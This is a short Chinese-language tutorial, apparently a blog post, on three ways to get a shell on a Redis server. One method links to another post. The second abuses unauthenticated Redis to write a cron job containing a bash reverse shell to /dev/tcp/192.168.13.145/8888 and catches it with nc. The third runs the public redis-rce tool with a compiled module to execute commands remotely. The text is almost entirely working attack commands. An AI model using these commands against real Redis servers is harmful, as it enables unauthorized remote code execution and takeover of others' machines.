redis getshell的三种方法

方法一

未授权访问复现-CSDN博客 的第一个。

方法二

wget http://download.redis.io/releases/redis-4.0.9.tar.gz

解压编译： 

tar -zxvf redis-4.0.9.tar.gz
cd redis-4.0.9
make
make test
make install

更改配置文件：

vim redis.conf //修改redis.conf的配置文件添加bind:0.0.0.0

启动redis：

redis-server /root/redis-4.0.9/redis.conf

攻击机开启连接： 

redis-cli -h 47.93.51.60
set  xx   "\n* * * * * bash -i >& /dev/tcp/192.168.13.145/8888 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

开启监听：

nc -lvvp 8888

方法三

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
git clone https://github.com/Ridter/redis-rce.git

进入RedisModules-ExecuteCommand目录输入make，生成moudle.so 文件 。

cp /home/wangyibo/桌面/RedisModules-ExecuteCommand/module.so /home/wangyibo/桌面/redis-rce  

把生成的moudle.so复制到redis-rce目录里面，之后进入redis-rce目录里面输入 

python redis-rce.py -r 192.168.13.145 -p 6379 -L 192.168.111.130 -f moudle.so